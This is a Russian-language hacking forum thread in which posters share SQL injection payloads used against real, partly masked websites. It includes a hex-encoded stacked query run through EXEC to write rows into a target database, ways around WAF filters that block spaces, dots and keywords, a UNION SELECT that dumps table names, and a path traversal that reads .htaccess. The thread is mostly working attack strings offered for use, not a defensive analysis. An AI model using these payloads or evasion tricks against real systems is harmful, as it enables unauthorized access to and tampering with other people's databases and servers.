Старый 17.04.2011, 09:18   #961
ont
 
Аватар для ont
 
Регистрация: 16.12.2010
Сообщений: 57
Репутация: 92
По умолчанию

Даю свою наводку:
Код:
http://***.ru/content/entrant/countdoc/z.php?id=7198 or FIO like 'ololo%'; 
DECLARE @S VARCHAR(4000) SET @S=CAST(0x696e7365727420696e746f206162697466756c6c5f202846494f292076616c7565732028276f6c6f6c6f3132332729 AS VARCHAR(4000)); EXEC(@S); --+
Как это понимать
Здесь в hex закодирован следующий запрос:
Код:
insert into abitfull_ (FIO) values ('ololo123')
Он выполняется через stacked query методику... (почему разрешен EXEC, хотя exec фильтруется, не знаю )
Гуру MSSQL меня поддержат? Можно ли инзертить данные из select? (т.к. hex, то waf не сработает)

P.S. Exec стащил отсюда https://docs.google.com/Doc?docid=0AZNlBave77hiZGNjanptbV84Z25yaHJmMjk (SQL Injection Pocket Reference)

Последний раз редактировалось Twost; 16.05.2013 в 09:16..
ont вне форума   Ответить с цитированием
Старый 17.04.2011, 13:30   #962
Ded MustD!e
Banned
 
Регистрация: 01.07.2010
Сообщений: 162
По умолчанию

Цитата:
Сообщение от ont Посмотреть сообщение
Можно ли инзертить данные из select? (т.к. hex, то waf не сработает)
зачем нам инзертить непосредственно из select, если можно разделять запросы через ;

а вообще вектор неплохой, после манипуляций с DECLARE у меня вылетела другая ошибка с путём:
Код:
FILE: E:\www\bitrix\modules\main\classes\general\main.php
так что по всей видимости, это всеми любимый ваф битрикса =)
Ded MustD!e вне форума   Ответить с цитированием
Старый 18.04.2011, 00:07   #963
Feldmarschall
 
Аватар для Feldmarschall
 
Регистрация: 06.07.2010
Сообщений: 30
Репутация: 2
По умолчанию

Цитата:
Сообщение от Ded MustD!e Посмотреть сообщение
From в твоём случае всё равно не проходит, конструкция %2b/*FROM*/+user не срабатывает, ты просто получаешь содержимое колонок из той же таблицы, к которой следует запрос.
Код:
http://***.ru/content/entrant/countdoc/z.php?id=(SELECT+TOP+1+Name)--
не заметил
значит тогда и select top 1 не нужны http://***.ru/content/entrant/countdoc/z.php?id=name--
__________________
В тюрьмах России половина невиновных


Последний раз редактировалось Twost; 16.05.2013 в 09:16..
Feldmarschall вне форума   Ответить с цитированием
Старый 20.04.2011, 20:42   #964
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Небольшой вопрос, если нельзя юзать пробелы, то как правильно строить запросы такими командами как where table_name=lol
или же into outfile ? Без использования пробелов.
Nightmare вне форума   Ответить с цитированием
Старый 20.04.2011, 21:03   #965
DrakonHaSh
 
Регистрация: 05.07.2010
Сообщений: 244
Репутация: 106
По умолчанию

например так
SELECT(COLUMN_NAME)FROM(INFORMATION_SCHEMA.COLUMNS )WHERE(TABLE_NAME='users')
select(1)INTO/**/OUTFILE/**/'outfile'
DrakonHaSh вне форума   Ответить с цитированием
Старый 21.04.2011, 18:25   #966
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Небольшой вопрос, если нельзя юзать пробелы, то как правильно строить запросы такими командами как where table_name=lol
или же into outfile ? Без использования пробелов.
https://rdot.org/forum/showthread.php?p=12068#post12068
Pashkela вне форума   Ответить с цитированием
Старый 22.04.2011, 04:15   #967
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от DrakonHaSh Посмотреть сообщение
например так
SELECT(COLUMN_NAME)FROM(INFORMATION_SCHEMA.COLUMNS )WHERE(TABLE_NAME='users')
select(1)INTO/**/OUTFILE/**/'outfile'
Ага спс, всё пашет. хотя первый раз пробовал WHERE(TABLE_NAME='users') не получилось
Nightmare вне форума   Ответить с цитированием
Старый 23.04.2011, 22:35   #968
recfrf
 
Регистрация: 29.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

из запроса фильтруется точка, к примеру информацию с information_schema.tables не вытянуть, обрезается после точки, варианты обхода есть какие?
recfrf вне форума   Ответить с цитированием
Старый 24.04.2011, 10:07   #969
ArtOfHack Slon
 
Регистрация: 06.04.2011
Сообщений: 11
Репутация: 3
По умолчанию

Oza

Цитата:
http://www.***.com/r/22/bracket/ramme.php?file=../../../.htaccess
ыть)
Цитата:
http://www.***.com/info.php?ident=news&sub=52'%20union%20select%201,2 ,3,4,5,group_concat%28table_name%29,7,8,9%20from%2 0information_schema.tables--%20--
ыть)

// убери пробелы, которые подставляет движок этого форума

Последний раз редактировалось Twost; 16.05.2013 в 09:18..
ArtOfHack Slon вне форума   Ответить с цитированием
Старый 25.04.2011, 21:38   #970
life_glider
 
Аватар для life_glider
 
Регистрация: 06.07.2010
Сообщений: 43
Репутация: 17
По умолчанию

допустим включен magic_quotes_gpc
как проэксплуатировать на *nix?
PHP код:
$path=realpath("/var/www/".$_GET['var']);
if(
pathinfo($path)['extension']=='css')
{
    eval(
"one_function('".$_GET['var']."');");

PS:
ответ - никак
__________________
Вы все такие классные
life_glider вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot